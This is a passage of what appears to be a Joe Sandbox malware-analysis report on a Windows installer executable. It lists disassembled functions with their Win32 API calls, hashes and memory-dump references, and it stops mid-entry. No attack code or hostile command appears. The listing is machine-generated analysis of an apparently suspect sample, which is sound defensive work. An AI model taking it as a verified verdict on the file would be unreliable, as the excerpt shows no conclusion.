                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindFirst
                                                                                              • String ID:
                                                                                              • API String ID: 1974802433-0
                                                                                              • Opcode ID: f3d53191a6114d87a635ba583fb771baa2153c083736da5485a901926fc49706
                                                                                              • Instruction ID: 14dcf34609860af9969e045d3f077fc7a18bb2554c958aa599433bfc977b1d94
                                                                                              • Opcode Fuzzy Hash: f3d53191a6114d87a635ba583fb771baa2153c083736da5485a901926fc49706
                                                                                              • Instruction Fuzzy Hash: 86F0E572A04101DFD700EBB49E49AEEB778DF51328FA0067BF101F20C1D2B84A45DB2A
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038F8
                                                                                              • ShowWindow.USER32(?), ref: 00403915
                                                                                              • DestroyWindow.USER32 ref: 00403929
                                                                                              • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403945
                                                                                              • GetDlgItem.USER32(?,?), ref: 00403966
                                                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 0040397A
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403981
                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403A2F
                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403A39
                                                                                              • SetClassLongA.USER32(?,000000F2,?), ref: 00403A53
                                                                                              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403AA4
                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403B4A
                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403B6B
                                                                                              • EnableWindow.USER32(?,?), ref: 00403B7D
                                                                                              • EnableWindow.USER32(?,?), ref: 00403B98
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403BAE
                                                                                              • EnableMenuItem.USER32(00000000), ref: 00403BB5
                                                                                              • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403BCD
                                                                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BE0
                                                                                              • lstrlenA.KERNEL32(00420478,?,00420478,00423680), ref: 00403C09
                                                                                              • SetWindowTextA.USER32(?,00420478), ref: 00403C18
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00403D4C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 184305955-0
                                                                                              • Opcode ID: d8b962e911b7c253e61e73d21e88cb3add85ad3b5a8fe6332aee3bd0e594c397
                                                                                              • Instruction ID: 874aaf0cc80a4ada72e8b6aceb9d73cb056a569e4b675a7f159d56e4bf17f1bf
                                                                                              • Opcode Fuzzy Hash: d8b962e911b7c253e61e73d21e88cb3add85ad3b5a8fe6332aee3bd0e594c397
                                                                                              • Instruction Fuzzy Hash: F9C18E71A04204BBDB206F21ED85E2B3E7CEB05746F40453EF641B52F1C779AA429B2E
                                                                                              APIs
                                                                                              • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F62
                                                                                              • GetDlgItem.USER32(00000000,000003E8), ref: 00403F76
                                                                                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403F94
                                                                                              • GetSysColor.USER32(?), ref: 00403FA5
                                                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FB4
                                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FC3
                                                                                              • lstrlenA.KERNEL32(?), ref: 00403FCD
                                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FDB
                                                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00403FEA
                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 0040404D
                                                                                              • SendMessageA.USER32(00000000), ref: 00404050
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 0040407B
                                                                                              • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004040BB
                                                                                              • LoadCursorA.USER32(00000000,00007F02), ref: 004040CA
                                                                                              • SetCursor.USER32(00000000), ref: 004040D3
                                                                                              • ShellExecuteA.SHELL32(0000070B,open, .B,00000000,00000000,00000001), ref: 004040E6
                                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 004040F3
                                                                                              • SetCursor.USER32(00000000), ref: 004040F6
                                                                                              • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404122
                                                                                              • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404136
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                              • String ID: .B$N$open
                                                                                              • API String ID: 3615053054-847860968
                                                                                              • Opcode ID: da112c14776137c7bd89e7c73a234b8b17dddee6ca60b81d448b510bce2e22e9
                                                                                              • Instruction ID: 4310844e4bc5412d85e0e67e924f78a0a7df87fdbfd2fc52009ff806257c2229
                                                                                              • Opcode Fuzzy Hash: da112c14776137c7bd89e7c73a234b8b17dddee6ca60b81d448b510bce2e22e9
                                                                                              • Instruction Fuzzy Hash: 3161A1B1A40209BFEB109F60DC45F6A7B69EB54715F108036FB05BA2D1C7B8E951CF98
                                                                                              APIs
                                                                                              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                              • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                              • DrawTextA.USER32(00000000,00423680,000000FF,00000010,00000820), ref: 00401156
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                              • String ID: F
                                                                                              • API String ID: 941294808-1304234792
                                                                                              • Opcode ID: a16a50f16efb259b1f94ca86ef79a5d51e0f349a280e4e705ab109419a7a434d
                                                                                              • Instruction ID: 87972a138d556bacb88ba9c7fcdf6f47da3ec758f00315b8b39b68d2b09e4b9a
                                                                                              • Opcode Fuzzy Hash: a16a50f16efb259b1f94ca86ef79a5d51e0f349a280e4e705ab109419a7a434d
                                                                                              • Instruction Fuzzy Hash: 6441BC71804249AFCB058FA4CD459BFBFB9FF44314F00812AF951AA1A0C378EA54DFA5
                                                                                              APIs
                                                                                                • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                                                                                • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                                                                                • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004054C0,?,00000000,000000F1,?), ref: 00405778
                                                                                              • GetShortPathNameA.KERNEL32(?,00422608,00000400), ref: 00405781
                                                                                              • GetShortPathNameA.KERNEL32(00000000,00422080,00000400), ref: 0040579E
                                                                                              • wsprintfA.USER32 ref: 004057BC
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00422080,C0000000,00000004,00422080,?,?,?,00000000,000000F1,?), ref: 004057F7
                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405806
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040581C
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421C80,00000000,-0000000A,00409330,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405862
                                                                                              • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405874
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040587B
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405882
                                                                                                • Part of subcall function 00405629: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405630
                                                                                                • Part of subcall function 00405629: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405837,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405660
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                              • String ID: %s=%s$[Rename]
                                                                                              • API String ID: 3772915668-1727408572
                                                                                              • Opcode ID: 07c12176a5373c156f7b76f79e2b8e53ec089a42cccabde25e202c2098703b15
                                                                                              • Instruction ID: 243778ea09c2d6121d89995a0746b628a30f71b2b4e684d8516dd3187c24d480
                                                                                              • Opcode Fuzzy Hash: 07c12176a5373c156f7b76f79e2b8e53ec089a42cccabde25e202c2098703b15
                                                                                              • Instruction Fuzzy Hash: 0E412032A05B067BE3207B619C48F6B3A5CEB40754F004436FD05F62D2EA38A8018ABE
                                                                                              APIs
                                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405C97
                                                                                              • CharNextA.USER32(?,?,?,00000000), ref: 00405CA4
                                                                                              • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CA9
                                                                                              • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,00000000,00403215), ref: 00405CB9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: Char$Next$Prev
                                                                                              • String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 589700163-1663183005
                                                                                              • Opcode ID: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
                                                                                              • Instruction ID: 6e21827f4117d195ccc2fee92ee9dbca2865e9be55a4e6ca6148cbd3e4a13511
                                                                                              • Opcode Fuzzy Hash: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
                                                                                              • Instruction Fuzzy Hash: F011905580CB942AFB3206384C48B776F99CB67764F58407BE8C4723C2D67C5C429B6D
                                                                                              APIs
                                                                                              • GetWindowLongA.USER32(?,000000EB), ref: 00403E13
                                                                                              • GetSysColor.USER32(00000000), ref: 00403E2F
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00403E3B
                                                                                              • SetBkMode.GDI32(?,?), ref: 00403E47
                                                                                              • GetSysColor.USER32(?), ref: 00403E5A
                                                                                              • SetBkColor.GDI32(?,?), ref: 00403E6A
                                                                                              • DeleteObject.GDI32(?), ref: 00403E84
                                                                                              • CreateBrushIndirect.GDI32(?), ref: 00403E8E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2320649405-0
                                                                                              • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                              • Instruction ID: 6c7fdd900eb09a88ca35fb2207b5deae9db7ec429e3ae93f4f07cdddb38981b8
                                                                                              • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                              • Instruction Fuzzy Hash: 1F219671904744ABCB219F78DD08B4B7FF8AF00715F048A2AF856E22E1C338EA04CB95
                                                                                              APIs
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
                                                                                              • GlobalFree.KERNEL32(?), ref: 00402725
                                                                                              • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0040273E
                                                                                              • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402756
                                                                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3294113728-0
                                                                                              • Opcode ID: 6c70dd5e24678078cb6415e9c6392547dd21b53fc970282deceed51b45fe2952
                                                                                              • Instruction ID: 12be5ee7c0a04460072f4a22dab7179149aa53ae67e7a866020ad89d1ba75591
                                                                                              • Opcode Fuzzy Hash: 6c70dd5e24678078cb6415e9c6392547dd21b53fc970282deceed51b45fe2952
                                                                                              • Instruction Fuzzy Hash: 5831C071C00128BBDF216FA5CD88EAE7E79EF04368F10423AF524762E0C7795D419BA8
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                                                                              • lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                                                                              • lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
                                                                                              • SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
                                                                                              • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                                                                              • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                                                                              • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                              • String ID:
                                                                                              • API String ID: 2531174081-0
                                                                                              • Opcode ID: aa11647610f970b6d5c89beb7753eaef7f091513a46ac0765cbf1dd94c7bd241
                                                                                              • Instruction ID: 7f48be0438031ac4014e4461c76190d89e96d247d5b12388d0b77bfdc4e74ae1
                                                                                              • Opcode Fuzzy Hash: aa11647610f970b6d5c89beb7753eaef7f091513a46ac0765cbf1dd94c7bd241
                                                                                              • Instruction Fuzzy Hash: 09216DB1E00158BBDB119FA5CD84ADEBFB9FF45354F14807AFA04B6290C7398A419B98
                                                                                              APIs
                                                                                              • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404665
                                                                                              • GetMessagePos.USER32 ref: 0040466D
                                                                                              • ScreenToClient.USER32(?,?), ref: 00404687
                                                                                              • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404699
                                                                                              • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004046BF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1326902067.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1326880661.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326943837.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1326968459.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1327054098.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Send$ClientScreen
                                                                                              • String ID: f
                                                                                              • API String ID: 41195575-1993550816
                                                                                              • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                              • Instruction ID: 811e074b116e6ce6d11e192741490be2760717d42b69e64a674173994bb84636
                                                                                              • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                              • Instruction Fuzzy Hash: 4E014C71D00219BADB00DBA4DC85FFEBBB8AB59711F10052ABA00B61D0D7B8A9058BA5
                                                                                              APIs
                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
                                                                                              • MulDiv.KERNEL32(0005E600,00000064,?), ref: 00402B81
                                                                                              • wsprintfA.USER32 ref: 00402B91
                                                                                              • SetWindowTextA.USER32(?,?), ref: 00402BA1
                                                                                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3
                                                                                              Strings
                                                                                              • verifying installer: %d%%, xrefs: 00402B8B
                                                                                              Memory Dump Source
